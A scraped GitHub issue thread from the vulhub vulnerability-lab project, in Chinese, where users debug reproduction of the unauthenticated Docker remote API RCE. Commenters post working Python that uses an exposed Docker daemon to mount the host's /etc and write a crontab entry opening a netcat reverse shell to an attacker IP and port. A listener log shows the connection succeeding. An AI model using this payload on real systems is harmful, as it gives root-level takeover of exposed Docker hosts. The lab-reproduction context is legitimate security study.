Comments (9)
运行容器docker-compose up -d
后,在本地用python执行:
import docker
client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 反弹地址 反弹端口 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
执行成功。
反弹shell成功:
没有遇到你说的问题。
from vulhub.
看不懂你的描述:
发现无法回弹nc
用 tcp://youip:2375/ ps 发现无容器, 无法执行命令
我们创建的容器是执行写入文件操作后立即删除的,他的目的只是为了修改crontab文件,完成任务后就删除,不会存在能一直看到这个容器的情况。
from vulhub.
from vulhub.
执行docker-compose exec docker sh
进入容器内,查看/etc/crontabs/root
,看看crontab是否写入成功。
因为是crontab,所以要等待1~2分钟才能收到shell。
排查这些错误,如果还是解决不了,我也没办法了,等待其他人反馈更多信息。
from vulhub.
那个 我好像解决了! 原因是 容器里面 nc 不支持-e 不知道为啥?
最后使用:
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /bin/sh | nc 192.168.0.112 9090' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
root@ubuntu:/home/xxxxxx/Desktop/vulhub/docker/unauthorized-rce# nc -lvvp 9090
Listening on [0.0.0.0] (family 0, port 9090)
Connection from 172.18.0.2 36961 received!
from vulhub.
不清楚,我的nc是支持的。。。先关闭issue了。
from vulhub.
从 @Tren 的截图可以看到,你使用的是ubuntu系统。ubuntu系统的 nc 属于 OpenBSD 分支:
The OpenBSD one doesn't support -e for executing a command after connection.
这个不属于 vulhub 的问题,该漏洞使用 docker 的 volumes 影响容器外宿主机的 crontab, 所以 payload 要根据宿主机发生变化。
from vulhub.
不能啊,是用的docker in docker,实际弹shell的应该是docker:dind呀。。不解。。
from vulhub.
还真是... 没有看 dockerfile 直接想当然的得结论。
这下丢脸了,师父快帮我关掉 PR.
不过不是这个原因的话是为什么呢... 不懂了...
from vulhub.
Related Issues (20)
- Request Dockerfile for each container img HOT 1
- airflow/CVE-2020-11978启动失败 HOT 1
- ERROR: error pulling image configuration: unknown blob HOT 2
- [Proposal] Adding a .desc file for each CVE container HOT 5
- Java RMI Registry 反序列化漏洞(<=jdk8u111)无法复现
- 苹果M1芯片启动项目时exec 格式错误 HOT 1
- php/xdebug-rce fails to build HOT 1
- Include `Dockerfile` in the repo HOT 3
- jumpserver随机数种子泄露导致账户劫持漏洞 默认admin账号密码无法登录 HOT 7
- 关于/grafana/admin-ssrf这个漏洞的一些问题。 HOT 2
- 关于 Compose file 的优化建议, 兼容 arm 架构 (M1 mac) HOT 6
- log4j/CVE-2021-44228: Unsupported operation HOT 2
- CVE-2017-17405镜像build失败 HOT 3
- phpmailer/CVE-2017-5223 build error HOT 3
- elasticsearch/CVE-2015-3337 build error HOT 1
- cve-2017-10271-weblogic-1运行不起来 HOT 4
- solr/CVE-2019-17558 容器运行失败 HOT 1
- 运行ecshop的安装界面失败 HOT 5
- OpenSSH 用户名枚举漏洞(CVE-2018-15473)不需要提交flag吗? HOT 3
- MINIO zh-cn.md文档细节问题 HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from vulhub.